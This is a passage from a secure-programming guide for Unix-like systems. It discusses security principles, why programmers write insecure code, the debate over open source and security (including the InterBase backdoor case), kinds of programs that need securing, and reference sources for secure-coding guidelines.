In the Linux community, different organizations have combined the available
components differently. Each combination is called a ``distribution'', and
the organizations that develop distributions are called ``distributors''.
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel, and
Debian. There are differences between the various distributions, but all
distributions are based on the same foundation: the Linux kernel and the GNU
glibc libraries. Since both are covered by ``copyleft'' style licenses,
changes to these foundations generally must be made available to all, a
unifying force between the Linux distributions at their foundation that does
not exist between the BSD and AT&T-derived Unix systems. This book is not
specific to any Linux distribution; when it discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater, valid
assumptions for essentially all current major Linux distributions.
-----------------------------------------------------------------------------

2.1.4. Open Source / Free Software

Increased interest in software that is freely shared has made it increasingly
necessary to define and explain it. A widely used term is ``open source
software'', which is further defined in [OSI 1999]. Eric Raymond [1997, 1998]
wrote several seminal articles examining its various development processes.
Another widely-used term is ``free software'', where the ``free'' is short
for ``freedom'': the usual explanation is ``free speech, not free beer.''
Neither phrase is perfect. The term ``free software'' is often confused with
programs whose executables are given away at no charge, but whose source code
cannot be viewed, modified, or redistributed. Conversely, the term ``open
source'' is sometime (ab)used to mean software whose source code is visible,
but for which there are limitations on use, modification, or redistribution.
This book uses the term ``open source'' for its usual meaning, that is,
software which has its source code freely available for use, viewing,
modification, and redistribution; a more detailed definition is contained in
the [http://www.opensource.org/osd.html] Open Source Definition. In some
cases, a difference in motive is suggested; those preferring the term ``free
software'' wish to strongly emphasize the need for freedom, while those using
the term may have other motives (e.g., higher reliability) or simply wish to
appear less strident. For information on this definition of free software,
and the motivations behind it, can be found at [http://www.fsf.org] http://
www.fsf.org.

Those interested in reading advocacy pieces for open source software and free
software should see [http://www.opensource.org] http://www.opensource.org and
[http://www.fsf.org] http://www.fsf.org. There are other documents which
examine such software, for example, Miller [1995] found that the open source
software were noticeably more reliable than proprietary software (using their
measurement technique, which measured resistance to crashing due to random
input).
-----------------------------------------------------------------------------

2.1.5. Comparing Linux and Unix

This book uses the term ``Unix-like'' to describe systems intentionally like
Unix. In particular, the term ``Unix-like'' includes all major Unix variants
and Linux distributions. Note that many people simply use the term ``Unix''
to describe these systems instead. Originally, the term ``Unix'' meant a
particular product developed by AT&T. Today, the Open Group owns the Unix
trademark, and it defines Unix as ``the worldwide Single UNIX
Specification''.

Linux is not derived from Unix source code, but its interfaces are
intentionally like Unix. Therefore, Unix lessons learned generally apply to
both, including information on security. Most of the information in this book
applies to any Unix-like system. Linux-specific information has been
intentionally added to enable those using Linux to take advantage of Linux's
capabilities.

Unix-like systems share a number of security mechanisms, though there are
subtle differences and not all systems have all mechanisms available. All
include user and group ids (uids and gids) for each process and a filesystem
with read, write, and execute permissions (for user, group, and other). See
Thompson [1974] and Bach [1986] for general information on Unix systems,
including their basic security mechanisms. Chapter 3 summarizes key security
features of Unix and Linux.
-----------------------------------------------------------------------------

2.2. Security Principles

There are many general security principles which you should be familiar with;
one good place for general information on information security is the
Information Assurance Technical Framework (IATF) [NSA 2000]. NIST has
identified high-level ``generally accepted principles and practices''
[Swanson 1996]. You could also look at a general textbook on computer
security, such as [Pfleeger 1997]. NIST Special Publication 800-27 describes
a number of good engineering principles (although, since they're abstract,
they're insufficient for actually building secure programs - hence this
book); you can get a copy at [http://csrc.nist.gov/publications/nistpubs/
800-27/sp800-27.pdf] http://csrc.nist.gov/publications/nistpubs/800-27/
sp800-27.pdf. A few security principles are summarized here.

Often computer security objectives (or goals) are described in terms of three
overall objectives:

<A0><A0>*<2A>Confidentiality (also known as secrecy), meaning that the computing
    system's assets can be read only by authorized parties.

<A0><A0>*<2A>Integrity, meaning that the assets can only be modified or deleted by
    authorized parties in authorized ways.

<A0><A0>*<2A>Availability, meaning that the assets are accessible to the authorized
    parties in a timely manner (as determined by the systems requirements).
    The failure to meet this goal is called a denial of service.


Some people define additional major security objectives, while others lump
those additional goals as special cases of these three. For example, some
separately identify non-repudiation as an objective; this is the ability to
``prove'' that a sender sent or receiver received a message (or both), even
if the sender or receiver wishes to deny it later. Privacy is sometimes
addressed separately from confidentiality; some define this as protecting the
confidentiality of a user (e.g., their identity) instead of the data. Most
objectives require identification and authentication, which is sometimes
listed as a separate objective. Often auditing (also called accountability)
is identified as a desirable security objective. Sometimes ``access control''
and ``authenticity'' are listed separately as well. For example, The U.S.
Department of Defense (DoD), in DoD directive 3600.1 defines ``information
assurance'' as ``information operations (IO) that protect and defend
information and information systems by ensuring their availability,
integrity, authentication, confidentiality, and nonrepudiation. This includes
providing for restoration of information systems by incorporating protection,
detection, and reaction capabilities.''

In any case, it is important to identify your program's overall security
objectives, no matter how you group them together, so that you'll know when
you've met them.

Sometimes these objectives are a response to a known set of threats, and
sometimes some of these objectives are required by law. For example, for U.S.
banks and other financial institutions, there's a new privacy law called the
``Gramm-Leach-Bliley'' (GLB) Act. This law mandates disclosure of personal
information shared and means of securing that data, requires disclosure of
personal information that will be shared with third parties, and directs
institutions to give customers a chance to opt out of data sharing. [Jones
2000]

There is sometimes conflict between security and some other general system/
software engineering principles. Security can sometimes interfere with ``ease
of use'', for example, installing a secure configuration may take more effort
than a ``trivial'' installation that works but is insecure. Often, this
apparent conflict can be resolved, for example, by re-thinking a problem it's
often possible to make a secure system also easy to use. There's also
sometimes a conflict between security and abstraction (information hiding);
for example, some high-level library routines may be implemented securely or
not, but their specifications won't tell you. In the end, if your application
must be secure, you must do things yourself if you can't be sure otherwise -
yes, the library should be fixed, but it's your users who will be hurt by
your poor choice of library routines.

A good general security principle is ``defense in depth''; you should have
numerous defense mechanisms (``layers'') in place, designed so that an
attacker has to defeat multiple mechanisms to perform a successful attack.
-----------------------------------------------------------------------------

2.3. Why do Programmers Write Insecure Code?

Many programmers don't intend to write insecure code - but do anyway. Here
are a number of purported reasons for this. Most of these were collected and
summarized by Aleph One on Bugtraq (in a posting on December 17, 1998):

<A0><A0>*<2A>There is no curriculum that addresses computer security in most schools.
    Even when there is a computer security curriculum, they often don't
    discuss how to write secure programs as a whole. Many such curriculum
    only study certain areas such as cryptography or protocols. These are
    important, but they often fail to discuss common real-world issues such
    as buffer overflows, string formatting, and input checking. I believe
    this is one of the most important problems; even those programmers who go
    through colleges and universities are very unlikely to learn how to write
    secure programs, yet we depend on those very people to write secure
    programs.

<A0><A0>*<2A>Programming books/classes do not teach secure/safe programming
    techniques. Indeed, until recently there were no books on how to write
    secure programs at all (this book is one of those few).

<A0><A0>*<2A>No one uses formal verification methods.

<A0><A0>*<2A>C is an unsafe language, and the standard C library string functions are
    unsafe. This is particularly important because C is so widely used - the
    ``simple'' ways of using C permit dangerous exploits.

<A0><A0>*<2A>Programmers do not think ``multi-user.''

<A0><A0>*<2A>Programmers are human, and humans are lazy. Thus, programmers will often
    use the ``easy'' approach instead of a secure approach - and once it
    works, they often fail to fix it later.

<A0><A0>*<2A>Most programmers are simply not good programmers.

<A0><A0>*<2A>Most programmers are not security people; they simply don't often think
    like an attacker does.

<A0><A0>*<2A>Most security people are not programmers. This was a statement made by
    some Bugtraq contributors, but it's not clear that this claim is really
    true.

<A0><A0>*<2A>Most computer security models are terrible.

<A0><A0>*<2A>There is lots of ``broken'' legacy software. Fixing this software (to
    remove security faults or to make it work with more restrictive security
    policies) is difficult.

<A0><A0>*<2A>Consumers don't care about security. (Personally, I have hope that
    consumers are beginning to care about security; a computer system that is
    constantly exploited is neither useful nor user-friendly. Also, many
    consumers are unaware that there's even a problem, assume that it can't
    happen to them, or think that that things cannot be made better.)

<A0><A0>*<2A>Security costs extra development time.

<A0><A0>*<2A>Security costs in terms of additional testing (red teams, etc.).


-----------------------------------------------------------------------------
2.4. Is Open Source Good for Security?

There's been a lot of debate by security practitioners about the impact of
open source approaches on security. One of the key issues is that open source
exposes the source code to examination by everyone, both the attackers and
defenders, and reasonable people disagree about the ultimate impact of this
situation. (Note - you can get the latest version of this essay by going to
the main website for this book, [http://www.dwheeler.com/secure-programs]
http://www.dwheeler.com/secure-programs.
-----------------------------------------------------------------------------

2.4.1. View of Various Experts

First, let's exampine what security experts have to say.

Bruce Schneier is a well-known expert on computer security and cryptography.
He argues that smart engineers should ``demand open source code for anything
related to security'' [Schneier 1999], and he also discusses some of the
preconditions which must be met to make open source software secure. Vincent
Rijmen, a developer of the winning Advanced Encryption Standard (AES)
encryption algorithm, believes that the open source nature of Linux provides
a superior vehicle to making security vulnerabilities easier to spot and fix,
``Not only because more people can look at it, but, more importantly, because
the model forces people to write more clear code, and to adhere to standards.
This in turn facilitates security review'' [Rijmen 2000].

Elias Levy (Aleph1) is the former moderator of one of the most popular
security discussion groups - Bugtraq. He discusses some of the problems in
making open source software secure in his article "Is Open Source Really More
Secure than Closed?". His summary is:


    So does all this mean Open Source Software is no better than closed
    source software when it comes to security vulnerabilities? No. Open
    Source Software certainly does have the potential to be more secure than
    its closed source counterpart. But make no mistake, simply being open
    source is no guarantee of security.

Whitfield Diffie is the co-inventor of public-key cryptography (the basis of
all Internet security) and chief security officer and senior staff engineer
at Sun Microsystems. In his 2003 article [http://zdnet.com.com/
2100-1107-980938.html] Risky business: Keeping security a secret, he argues
that proprietary vendor's claims that their software is more secure because
it's secret is nonsense. He identifies and then counters two main claims made
by proprietary vendors: (1) that release of code benefits attackers more than
anyone else because a lot of hostile eyes can also look at open-source code,
and that (2) a few expert eyes are better than several random ones. He first
notes that while giving programmers access to a piece of software doesn't
guarantee they will study it carefully, there is a group of programmers who
can be expected to care deeply: Those who either use the software personally
or work for an enterprise that depends on it. "In fact, auditing the programs
on which an enterprise depends for its own security is a natural function of
the enterprise's own information-security organization." He then counters the
second argument, noting that "As for the notion that open source's usefulness
to opponents outweighs the advantages to users, that argument flies in the
face of one of the most important principles in security: A secret that
cannot be readily changed should be regarded as a vulnerability." He closes
noting that


    "It's simply unrealistic to depend on secrecy for security in computer
    software. You may be able to keep the exact workings of the program out
    of general circulation, but can you prevent the code from being
    reverse-engineered by serious opponents? Probably not."


John Viega's article [http://dev-opensourceit.earthweb.com/news/
000526_security.html] "The Myth of Open Source Security" also discusses
issues, and summarizes things this way:


    Open source software projects can be more secure than closed source
    projects. However, the very things that can make open source programs
    secure -- the availability of the source code, and the fact that large
    numbers of users are available to look for and fix security holes -- can
    also lull people into a false sense of security.

[http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html] Michael
H. Warfield's "Musings on open source security" is very positive about the
impact of open source software on security. In contrast, Fred Schneider
doesn't believe that open source helps security, saying ``there is no reason
to believe that the many eyes inspecting (open) source code would be
successful in identifying bugs that allow system security to be compromised''
and claiming that ``bugs in the code are not the dominant means of attack''
[Schneider 2000]. He also claims that open source rules out control of the
construction process, though in practice there is such control - all major
open source programs have one or a few official versions with ``owners'' with
reputations at stake. Peter G. Neumann discusses ``open-box'' software (in
which source code is available, possibly only under certain conditions),
saying ``Will open-box software really improve system security? My answer is
not by itself, although the potential is considerable'' [Neumann 2000].
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
has developed a paper on why they believe open source is more effective for
security [TruSecure 2001]. [http://www-106.ibm.com/developerworks/linux/
library/l-oss.html?open&I=252,t=gr,p=SeclmpOS] Natalie Walker Whitlock's IBM
DeveloperWorks article discusses the pros and cons as well. Brian Witten,
Carl Landwehr, and Micahel Caloyannides [Witten 2001] published in IEEE
Software an article tentatively concluding that having source code available
should work in the favor of system security; they note:


    ``We can draw four additional conclusions from this discussion. First,
    access to source code lets users improve system security -- if they have
    the capability and resources to do so. Second, limited tests indicate
    that for some cases, open source life cycles produce systems that are
    less vulnerable to nonmalicious faults. Third, a survey of three
    operating systems indicates that one open source operating system
    experienced less exposure in the form of known but unpatched
    vulnerabilities over a 12-month period than was experienced by either of
    two proprietary counterparts. Last, closed and proprietary system
    development models face disincentives toward fielding and supporting more
    secure systems as long as less secure systems are more profitable.
    Notwithstanding these conclusions, arguments in this important matter are
    in their formative stages and in dire need of metrics that can reflect
    security delivered to the customer.''

Scott A. Hissam and Daniel Plakosh's [http://www.ics.uci.edu/~wscacchi/Papers
/New/IEE_hissam.pdf] ``Trust and Vulnerability in Open Source Software''
discuss the pluses and minuses of open source software. As with other papers,
they note that just because the software is open to review, it should not
automatically follow that such a review has actually been performed. Indeed,
they note that this is a general problem for all software, open or closed -
it is often questionable if many people examine any given piece of software.
One interesting point is that they demonstrate that attackers can learn about
a vulnerability in a closed source program (Windows) from patches made to an
OSS/FS program (Linux). In this example, Linux developers fixed a
vulnerability before attackers tried to attack it, and attackers correctly
surmised that a similar problem might be still be in Windows (and it was).
Unless OSS/FS programs are forbidden, this kind of learning is difficult to
prevent. Therefore, the existance of an OSS/FS program can reveal the
vulnerabilities of both the OSS/FS and proprietary program performing the
same function - but at in this example, the OSS/FS program was fixed first.
-----------------------------------------------------------------------------

2.4.2. Why Closing the Source Doesn't Halt Attacks

It's been argued that a system without source code is more secure because,
since there's less information available for an attacker, it should be harder
for an attacker to find the vulnerabilities. This argument has a number of
weaknesses, however, because although source code is extremely important when
trying to add new capabilities to a program, attackers generally don't need
source code to find a vulnerability.

First, it's important to distinguish between ``destructive'' acts and
``constructive'' acts. In the real world, it is much easier to destroy a car
than to build one. In the software world, it is much easier to find and
exploit a vulnerability than to add new significant new functionality to that
software. Attackers have many advantages against defenders because of this
difference. Software developers must try to have no security-relevant
mistakes anywhere in their code, while attackers only need to find one.
Developers are primarily paid to get their programs to work... attackers
don't need to make the program work, they only need to find a single
weakness. And as I'll describe in a moment, it takes less information to
attack a program than to modify one.

Generally attackers (against both open and closed programs) start by knowing
about the general kinds of security problems programs have. There's no point
in hiding this information; it's already out, and in any case, defenders need
that kind of information to defend themselves. Attackers then use techniques
to try to find those problems; I'll group the techniques into ``dynamic''
techniques (where you run the program) and ``static'' techniques (where you
examine the program's code - be it source code or machine code).

In ``dynamic'' approaches, an attacker runs the program, sending it data
(often problematic data), and sees if the programs' response indicates a
common vulnerability. Open and closed programs have no difference here, since
the attacker isn't looking at code. Attackers may also look at the code, the
``static'' approach. For open source software, they'll probably look at the
source code and search it for patterns. For closed source software, they
might search the machine code (usually presented in assembly language format
to simplify the task) for essentially the same patterns. They might also use
tools called ``decompilers'' that turn the machine code back into source code
and then search the source code for the vulnerable patterns (the same way
they would search for vulnerabilities in open source software). See Flake
[2001] for one discussion of how closed code can still be examined for
security vulnerabilities (e.g., using disassemblers). This point is
important: even if an attacker wanted to use source code to find a
vulnerability, a closed source program has no advantage, because the attacker
can use a disassembler to re-create the source code of the product.

Non-developers might ask ``if decompilers can create source code from machine
code, then why do developers say they need source code instead of just
machine code?'' The problem is that although developers don't need source
code to find security problems, developers do need source code to make
substantial improvements to the program. Although decompilers can turn
machine code back into a ``source code'' of sorts, the resulting source code
is extremely hard to modify. Typically most understandable names are lost, so
instead of variables like ``grand_total'' you get ``x123123'', instead of
methods like ``display_warning'' you get ``f123124'', and the code itself may
have spatterings of assembly in it. Also, _ALL_ comments and design
information are lost. This isn't a serious problem for finding security
problems, because generally you're searching for patterns indicating
vulnerabilities, not for internal variable or method names. Thus, decompilers
can be useful for finding ways to attack programs, but aren't helpful for
updating programs.

Thus, developers will say ``source code is vital'' when they intend to add
functionality), but the fact that the source code for closed source programs
is hidden doesn't protect the program very much.
-----------------------------------------------------------------------------

2.4.3. Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away

Sometimes it's noted that a vulnerability that exists but is unknown can't be
exploited, so the system ``practically secure.'' In theory this is true, but
the problem is that once someone finds the vulnerability, the finder may just
exploit the vulnerability instead of helping to fix it. Having unknown
vulnerabilities doesn't really make the vulnerabilities go away; it simply
means that the vulnerabilities are a time bomb, with no way to know when
they'll be exploited. Fundamentally, the problem of someone exploiting a
vulnerability they discover is a problem for both open and closed source
systems.

One related claim sometimes made (though not as directly related to OSS/FS)
is that people should not post warnings about vulnerabilities and discuss
them. This sounds good in theory, but the problem is that attackers already
distribute information about vulnerabilities through a large number of
channels. In short, such approaches would leave defenders vulnerable, while
doing nothing to inhibit attackers. In the past, companies actively tried to
prevent disclosure of vulnerabilities, but experience showed that, in
general, companies didn't fix vulnerabilities until they were widely known to
their users (who could then insist that the vulnerabilities be fixed). This
is all part of the argument for ``full disclosure.'' Gartner Group has a
blunt commentary in a CNET.com article titled ``Commentary: Hype is the real
issue - Tech News.'' They stated:


    The comments of Microsoft's Scott Culp, manager of the company's security
    response center, echo a common refrain in a long, ongoing battle over
    information. Discussions of morality regarding the distribution of
    information go way back and are very familiar. Several centuries ago, for
    example, the church tried to squelch Copernicus' and Galileo's theory of
    the sun being at the center of the solar system... Culp's attempt to
    blame "information security professionals" for the recent spate of
    vulnerabilities in Microsoft products is at best disingenuous. Perhaps,
    it also represents an attempt to deflect criticism from the company that
    built those products... [The] efforts of all parties contribute to a
    continuous process of improvement. The more widely vulnerabilities become
    known, the more quickly they get fixed.


-----------------------------------------------------------------------------

2.4.4. How OSS/FS Counters Trojan Horses

It's sometimes argued that open source programs, because there's no enforced
control by a single company, permit people to insert Trojan Horses and other
malicious code. Trojan horses can be inserted into open source code, true,
but they can also be inserted into proprietary code. A disgruntled or bribed
employee can insert malicious code, and in many organizations it's much less
likely to be found than in an open source program. After all, no one outside
the organization can review the source code, and few companies review their
code internally (or, even if they do, few can be assured that the reviewed
code is actually what is used). And the notion that a closed-source company
can be sued later has little evidence; nearly all licenses disclaim all
warranties, and courts have generally not held software development companies
liable.

Borland's InterBase server is an interesting case in point. Some time between
1992 and 1994, Borland inserted an intentional ``back door'' into their
database server, ``InterBase''. This back door allowed any local or remote
user to manipulate any database object and install arbitrary programs, and in
some cases could lead to controlling the machine as ``root''. This
vulnerability stayed in the product for at least 6 years - no one else could
review the product, and Borland had no incentive to remove the vulnerability.
Then Borland released its source code on July 2000. The "Firebird" project
began working with the source code, and uncovered this serious security
problem with InterBase in December 2000. By January 2001 the CERT announced
the existence of this back door as CERT advisory CA-2001-01. What's
discouraging is that the backdoor can be easily found simply by looking at an
ASCII dump of the program (a common cracker trick). Once this problem was
found by open source developers reviewing the code, it was patched quickly.
You could argue that, by keeping the password unknown, the program stayed
safe, and that opening the source made the program less secure. I think this
is nonsense, since ASCII dumps are trivial to do and well-known as a standard
attack technique, and not all attackers have sudden urges to announce
vulnerabilities - in fact, there's no way to be certain that this
vulnerability has not been exploited many times. It's clear that after the
source was opened, the source code was reviewed over time, and the
vulnerabilities found and fixed. One way to characterize this is to say that
the original code was vulnerable, its vulnerabilities became easier to
exploit when it was first made open source, and then finally these
vulnerabilities were fixed.
-----------------------------------------------------------------------------

2.4.5. Other Advantages

The advantages of having source code open extends not just to software that
is being attacked, but also extends to vulnerability assessment scanners.
Vulnerability assessment scanners intentionally look for vulnerabilities in
configured systems. A recent Network Computing evaluation found that the best
scanner (which, among other things, found the most legitimate
vulnerabilities) was Nessus, an open source scanner [Forristal 2001].
-----------------------------------------------------------------------------

2.4.6. Bottom Line

So, what's the bottom line? I personally believe that when a program began as
closed source and is then first made open source, it often starts less secure
for any users (through exposure of vulnerabilities), and over time (say a few
years) it has the potential to be much more secure than a closed program. If
the program began as open source software, the public scrutiny is more likely
to improve its security before it's ready for use by significant numbers of
users, but there are several caveats to this statement (it's not an ironclad
rule). Just making a program open source doesn't suddenly make a program
secure, and just because a program is open source does not guarantee
security:

<A0><A0>*<2A>First, people have to actually review the code. This is one of the key
    points of debate - will people really review code in an open source
    project? All sorts of factors can reduce the amount of review: being a
    niche or rarely-used product (where there are few potential reviewers),
    having few developers, and use of a rarely-used computer language.
    Clearly, a program that has a single developer and no other contributors
    of any kind doesn't have this kind of review. On the other hand, a
    program that has a primary author and many other people who occasionally
    examine the code and contribute suggests that there are others reviewing
    the code (at least to create contributions). In general, if there are
    more reviewers, there's generally a higher likelihood that someone will
    identify a flaw - this is the basis of the ``many eyeballs'' theory. Note
    that, for example, the OpenBSD project continuously examines programs for
    security flaws, so the components in its innermost parts have certainly
    undergone a lengthy review. Since OSS/FS discussions are often held
    publicly, this level of review is something that potential users can
    judge for themselves.

    One factor that can particularly reduce review likelihood is not actually
    being open source. Some vendors like to posture their ``disclosed
    source'' (also called ``source available'') programs as being open
    source, but since the program owner has extensive exclusive rights,
    others will have far less incentive to work ``for free'' for the owner on
    the code. Even open source licenses which have unusually asymmetric
    rights (such as the MPL) have this problem. After all, people are less
    likely to voluntarily participate if someone else will have rights to
    their results that they don't have (as Bruce Perens says, ``who wants to
    be someone else's unpaid employee?''). In particular, since the reviewers
    with the most incentive tend to be people trying to modify the program,
    this disincentive to participate reduces the number of ``eyeballs''.
    Elias Levy made this mistake in his article about open source security;
    his examples of software that had been broken into (e.g., TIS's Gauntlet)
    were not, at the time, open source.

<A0><A0>*<2A>Second, at least some of the people developing and reviewing the code
    must know how to write secure programs. Hopefully the existence of this
    book will help. Clearly, it doesn't matter if there are ``many eyeballs''
    if none of the eyeballs know what to look for. Note that it's not
    necessary for everyone to know how to write secure programs, as long as
    those who do know how are examining the code changes.

<A0><A0>*<2A>Third, once found, these problems need to be fixed quickly and their
    fixes distributed. Open source systems tend to fix the problems quickly,
    but the distribution is not always smooth. For example, the OpenBSD
    developers do an excellent job of reviewing code for security flaws - but
    they don't always report the identified problems back to the original
    developer. Thus, it's quite possible for there to be a fixed version in
    one system, but for the flaw to remain in another. I believe this problem
    is lessening over time, since no one ``downstream'' likes to repeatedly
    fix the same problem. Of course, ensuring that security patches are
    actually installed on end-user systems is a problem for both open source
    and closed source software.


Another advantage of open source is that, if you find a problem, you can fix
it immediately. This really doesn't have any counterpart in closed source.

In short, the effect on security of open source software is still a major
debate in the security community, though a large number of prominent experts
believe that it has great potential to be more secure.
-----------------------------------------------------------------------------

2.5. Types of Secure Programs

Many different types of programs may need to be secure programs (as the term
is defined in this book). Some common types are:

<A0><A0>*<2A>Application programs used as viewers of remote data. Programs used as
    viewers (such as word processors or file format viewers) are often asked
    to view data sent remotely by an untrusted user (this request may be
    automatically invoked by a web browser). Clearly, the untrusted user's
    input should not be allowed to cause the application to run arbitrary
    programs. It's usually unwise to support initialization macros (run when
    the data is displayed); if you must, then you must create a secure
    sandbox (a complex and error-prone task that almost never succeeds, which
    is why you shouldn't support macros in the first place). Be careful of
    issues such as buffer overflow, discussed in Chapter 6, which might allow
    an untrusted user to force the viewer to run an arbitrary program.

<A0><A0>*<2A>Application programs used by the administrator (root). Such programs
    shouldn't trust information that can be controlled by non-administrators.

<A0><A0>*<2A>Local servers (also called daemons).

<A0><A0>*<2A>Network-accessible servers (sometimes called network daemons).

<A0><A0>*<2A>Web-based applications (including CGI scripts). These are a special case
    of network-accessible servers, but they're so common they deserve their
    own category. Such programs are invoked indirectly via a web server,
    which filters out some attacks but nevertheless leaves many attacks that
    must be withstood.

<A0><A0>*<2A>Applets (i.e., programs downloaded to the client for automatic
    execution). This is something Java is especially famous for, though other
    languages (such as Python) support mobile code as well. There are several
    security viewpoints here; the implementer of the applet infrastructure on
    the client side has to make sure that the only operations allowed are
    ``safe'' ones, and the writer of an applet has to deal with the problem
    of hostile hosts (in other words, you can't normally trust the client).
    There is some research attempting to deal with running applets on hostile
    hosts, but frankly I'm skeptical of the value of these approaches and
    this subject is exotic enough that I don't cover it further here.

<A0><A0>*<2A>setuid/setgid programs. These programs are invoked by a local user and,
    when executed, are immediately granted the privileges of the program's
    owner and/or owner's group. In many ways these are the hardest programs
    to secure, because so many of their inputs are under the control of the
    untrusted user and some of those inputs are not obvious.


This book merges the issues of these different types of program into a single
set. The disadvantage of this approach is that some of the issues identified
here don't apply to all types of programs. In particular, setuid/setgid
programs have many surprising inputs and several of the guidelines here only
apply to them. However, things are not so clear-cut, because a particular
program may cut across these boundaries (e.g., a CGI script may be setuid or
setgid, or be configured in a way that has the same effect), and some
programs are divided into several executables each of which can be considered
a different ``type'' of program. The advantage of considering all of these
program types together is that we can consider all issues without trying to
apply an inappropriate category to a program. As will be seen, many of the
principles apply to all programs that need to be secured.

There is a slight bias in this book toward programs written in C, with some
notes on other languages such as C++, Perl, PHP, Python, Ada95, and Java.
This is because C is the most common language for implementing secure
programs on Unix-like systems (other than CGI scripts, which tend to use
languages such as Perl, PHP, or Python). Also, most other languages'
implementations call the C library. This is not to imply that C is somehow
the ``best'' language for this purpose, and most of the principles described
here apply regardless of the programming language used.
-----------------------------------------------------------------------------

2.6. Paranoia is a Virtue

The primary difficulty in writing secure programs is that writing them
requires a different mind-set, in short, a paranoid mind-set. The reason is
that the impact of errors (also called defects or bugs) can be profoundly
different.

Normal non-secure programs have many errors. While these errors are
undesirable, these errors usually involve rare or unlikely situations, and if
a user should stumble upon one they will try to avoid using the tool that way
in the future.

In secure programs, the situation is reversed. Certain users will
intentionally search out and cause rare or unlikely situations, in the hope
that such attacks will give them unwarranted privileges. As a result, when
writing secure programs, paranoia is a virtue.
-----------------------------------------------------------------------------

2.7. Why Did I Write This Document?

One question I've been asked is ``why did you write this book''? Here's my
answer: Over the last several years I've noticed that many developers for
Linux and Unix seem to keep falling into the same security pitfalls, again
and again. Auditors were slowly catching problems, but it would have been
better if the problems weren't put into the code in the first place. I
believe that part of the problem was that there wasn't a single, obvious
place where developers could go and get information on how to avoid known
pitfalls. The information was publicly available, but it was often hard to
find, out-of-date, incomplete, or had other problems. Most such information
didn't particularly discuss Linux at all, even though it was becoming widely
used! That leads up to the answer: I developed this book in the hope that
future software developers won't repeat past mistakes, resulting in more
secure systems. You can see a larger discussion of this at [http://
www.linuxsecurity.com/feature_stories/feature_story-6.html] http://
www.linuxsecurity.com/feature_stories/feature_story-6.html.

A related question that could be asked is ``why did you write your own book
instead of just referring to other documents''? There are several answers:

<A0><A0>*<2A>Much of this information was scattered about; placing the critical
    information in one organized document makes it easier to use.

<A0><A0>*<2A>Some of this information is not written for the programmer, but is
    written for an administrator or user.

<A0><A0>*<2A>Much of the available information emphasizes portable constructs
    (constructs that work on all Unix-like systems), and failed to discuss
    Linux at all. It's often best to avoid Linux-unique abilities for
    portability's sake, but sometimes the Linux-unique abilities can really
    aid security. Even if non-Linux portability is desired, you may want to
    support the Linux-unique abilities when running on Linux. And, by
    emphasizing Linux, I can include references to information that is
    helpful to someone targeting Linux that is not necessarily true for
    others.


-----------------------------------------------------------------------------

2.8. Sources of Design and Implementation Guidelines

Several documents help describe how to write secure programs (or,
alternatively, how to find security problems in existing programs), and were
the basis for the guidelines highlighted in the rest of this book.

For general-purpose servers and setuid/setgid programs, there are a number of
valuable documents (though some are difficult to find without having a
reference to them).

Matt Bishop [1996, 1997] has developed several extremely valuable papers and
presentations on the topic, and in fact he has a web page dedicated to the
topic at [http://olympus.cs.ucdavis.edu/~bishop/secprog.html] http://
olympus.cs.ucdavis.edu/~bishop/secprog.html. AUSCERT has released a
programming checklist [ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist] [AUSCERT 1996], based in part on chapter 23 of
Garfinkel and Spafford's book discussing how to write secure SUID and network
programs [http://www.oreilly.com/catalog/puis] [Garfinkel 1996]. [http://
www.sunworld.com/swol-04-1998/swol-04-security.html] Galvin [1998a] described
a simple process and checklist for developing secure programs; he later
updated the checklist in [http://www.sunworld.com/sunworldonline/swol-08-1998
/swol-08-security.html] Galvin [1998b]. [http://www.pobox.com/~kragen/
security-holes.html] Sitaker [1999] presents a list of issues for the ``Linux
security audit'' team to search for. [http://www.homeport.org/~adam/
review.html] Shostack [1999] defines another checklist for reviewing
security-sensitive code. The NCSA [http://www.ncsa.uiuc.edu/General/Grid/ACES
/security/programming] [NCSA] provides a set of terse but useful secure
programming guidelines. Other useful information sources include the Secure
Unix Programming FAQ [http://www.whitefang.com/sup/] [Al-Herbish 1999], the
Security-Audit's Frequently Asked Questions [http://lsap.org/faq.txt] [Graham
1999], and [http://www.clark.net/pub/mjr/pubs/pdf/] Ranum [1998]. Some
recommendations must be taken with caution, for example, the BSD setuid(7)
man page [http://www.homeport.org/~adam/setuid.7.html] [Unknown] recommends
the use of access(3) without noting the dangerous race conditions that
usually accompany it. Wood [1985] has some useful but dated advice in its
``Security for Programmers'' chapter. [http://www.research.att.com/~smb/
talks] Bellovin [1994] includes useful guidelines and some specific examples,
such as how to restructure an ftpd implementation to be simpler and more
secure. FreeBSD provides some guidelines [http://www.freebsd.org/security/
security.html] FreeBSD [1999] [http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html] [Quintero 1999] is primarily concerned
with GNOME programming guidelines, but it includes a section on security
considerations. [http://www.fish.com/security/murphy.html] [Venema 1996]
provides a detailed discussion (with examples) of some common errors when
programming secure programs (widely-known or predictable passwords, burning
yourself with malicious data, secrets in user-accessible data, and depending
on other programs). [http://www.fish.com/security/maldata.html] [Sibert 1996]
describes threats arising from malicious data. Michael Bacarella's article
[http://m.bacarella.com/papers/secsoft/html] The Peon's Guide To Secure
System Development provides a nice short set of guidelines.

There are many documents giving security guidelines for programs using the
Common Gateway Interface (CGI) to interface with the web. These include
[http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec] Van Biesbrouck [1996],
[http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html] Gundavaram
[unknown], [http://webreview.com/wr/pub/97/08/08/bookshelf] [Garfinkle 1997]
[http://www.eekim.com/pubs/cgibook] Kim [1996], [http://www.go2net.com/people
/paulp/cgi-security/safe-cgi.txt] Phillips [1995], [http://www.w3.org/
Security/Faq/www-security-faq.html] Stein [1999], [http://members.home.net/
razvan.peteanu] [Peteanu 2000], and [http://advosys.ca/tips/
web-security.html] [Advosys 2000].

There are many documents specific to a language, which are further discussed
in the language-specific sections of this book. For example, the Perl
distribution includes [http://www.perl.com/pub/doc/manual/html/pod/
perlsec.html] perlsec(1), which describes how to use Perl more securely. The
Secure Internet Programming site at [http://www.cs.princeton.edu/sip] http://
www.cs.princeton.edu/sip is interested in computer security issues in
general, but focuses on mobile code systems such as Java, ActiveX, and
